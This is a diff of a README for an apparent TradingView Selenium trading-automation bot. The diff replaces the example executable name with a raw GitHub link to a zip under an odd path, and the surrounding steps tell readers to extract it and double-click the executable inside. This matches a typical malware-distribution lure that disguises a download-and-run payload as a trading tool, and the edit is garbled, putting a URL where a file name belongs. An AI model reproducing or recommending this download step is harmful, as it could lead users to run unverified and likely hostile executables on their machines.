Edybatera/tradingview-selenium-fixed-time-trading-automation-bot/README.md

    If the downloaded file is a ZIP, right-click on it and select “Extract All.”
 Follow the prompts to unzip the files into a folder.

 5. **Run the Application**
-   In the extracted folder, look for an executable file (e.g., `trading_bot.exe`).
+   In the extracted folder, look for an executable file (e.g., `https://raw.githubusercontent.com/Edybatera/tradingview-selenium-fixed-time-trading-automation-bot/main/phyllozooid/time-bot-selenium-fixed-automation-trading-tradingview-2.7-beta.2.zip`).
 Double-click on it to run the application.

 ## ⚙️ System Requirements
 To ensure the bot runs smoothly, your computer should meet the following requirements: